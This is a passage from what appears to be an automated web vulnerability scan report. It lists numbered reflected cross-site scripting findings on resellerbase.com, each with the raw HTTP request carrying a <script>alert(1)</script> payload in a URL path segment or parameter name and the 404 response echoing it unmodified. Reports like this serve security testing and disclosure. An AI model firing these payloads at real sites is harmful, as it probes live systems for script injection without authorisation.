User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themesbc092<script>alert(1)</script>fba3fdb90a2/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3025. http://www.resellerbase.com/detail/42/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c1a09<script>alert(1)</script>1d868e9c1ea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmosc1a09<script>alert(1)</script>1d868e9c1ea/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmosc1a09<script>alert(1)</script>1d868e9c1ea/images/ was not found on this server.</p>
...[SNIP]...

2.3026. http://www.resellerbase.com/detail/42/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ec3a4<script>alert(1)</script>b562b7645c8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/imagesec3a4<script>alert(1)</script>b562b7645c8/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/imagesec3a4<script>alert(1)</script>b562b7645c8/ was not found on this server.</p>
...[SNIP]...

2.3027. http://www.resellerbase.com/detail/42/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 59fa4<script>alert(1)</script>a27001badd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/?59fa4<script>alert(1)</script>a27001badd9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/?59fa4<script>alert(1)</script>a27001badd9=1 was not found on this server.</p>
...[SNIP]...

2.3028. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 279a2<script>alert(1)</script>b5bce08ba72 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail279a2<script>alert(1)</script>b5bce08ba72/42/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail279a2<script>alert(1)</script>b5bce08ba72/42/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3029. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66da0<script>alert(1)</script>4741c031f22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4266da0<script>alert(1)</script>4741c031f22/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4266da0<script>alert(1)</script>4741c031f22/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3030. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4f23a<script>alert(1)</script>83a3f9a25b8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes4f23a<script>alert(1)</script>83a3f9a25b8/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes4f23a<script>alert(1)</script>83a3f9a25b8/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3031. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e6263<script>alert(1)</script>97b2e7368e7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmose6263<script>alert(1)</script>97b2e7368e7/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmose6263<script>alert(1)</script>97b2e7368e7/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3032. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f394c<script>alert(1)</script>fa2ac328690 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/imagesf394c<script>alert(1)</script>fa2ac328690/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/imagesf394c<script>alert(1)</script>fa2ac328690/rating/ was not found on this server.</p>
...[SNIP]...

2.3033. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 34e23<script>alert(1)</script>973c28e51be was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/rating34e23<script>alert(1)</script>973c28e51be/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/rating34e23<script>alert(1)</script>973c28e51be/ was not found on this server.</p>
...[SNIP]...

2.3034. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 32d05<script>alert(1)</script>9819c213dac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/rating/?32d05<script>alert(1)</script>9819c213dac=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/rating/?32d05<script>alert(1)</script>9819c213dac=1 was not found on this server.</p>
...[SNIP]...

2.3035. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e5124<script>alert(1)</script>675b74dc32f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile5124<script>alert(1)</script>675b74dc32f/42/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile5124<script>alert(1)</script>675b74dc32f/42/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3036. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3b525<script>alert(1)</script>c538b772b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/423b525<script>alert(1)</script>c538b772b0/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/423b525<script>alert(1)</script>c538b772b0/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3037. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 87359<script>alert(1)</script>7328addab8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes87359<script>alert(1)</script>7328addab8d/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes87359<script>alert(1)</script>7328addab8d/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3038. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3ee53<script>alert(1)</script>0aed6a1f60c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos3ee53<script>alert(1)</script>0aed6a1f60c/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos3ee53<script>alert(1)</script>0aed6a1f60c/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3039. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f1e59<script>alert(1)</script>3fa310bdaa5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/imagesf1e59<script>alert(1)</script>3fa310bdaa5/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/imagesf1e59<script>alert(1)</script>3fa310bdaa5/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3040. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 90593<script>alert(1)</script>a42c0aed50d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/rating90593<script>alert(1)</script>a42c0aed50d/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/rating90593<script>alert(1)</script>a42c0aed50d/0.gif was not found on this server.</p>
...[SNIP]...

2.3041. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b9c34<script>alert(1)</script>c3e8127a812 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/rating/0.gifb9c34<script>alert(1)</script>c3e8127a812 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/rating/0.gifb9c34<script>alert(1)</script>c3e8127a812 was not found on this server.</p>
...[SNIP]...

2.3042. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e77d2<script>alert(1)</script>2e1c315fcb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/rating/0.gif?e77d2<script>alert(1)</script>2e1c315fcb9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/rating/0.gif?e77d2<script>alert(1)</script>2e1c315fcb9=1 was not found on this server.</p>
...[SNIP]...

2.3043. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7b4c9<script>alert(1)</script>a524b9df05c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7b4c9<script>alert(1)</script>a524b9df05c/42/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
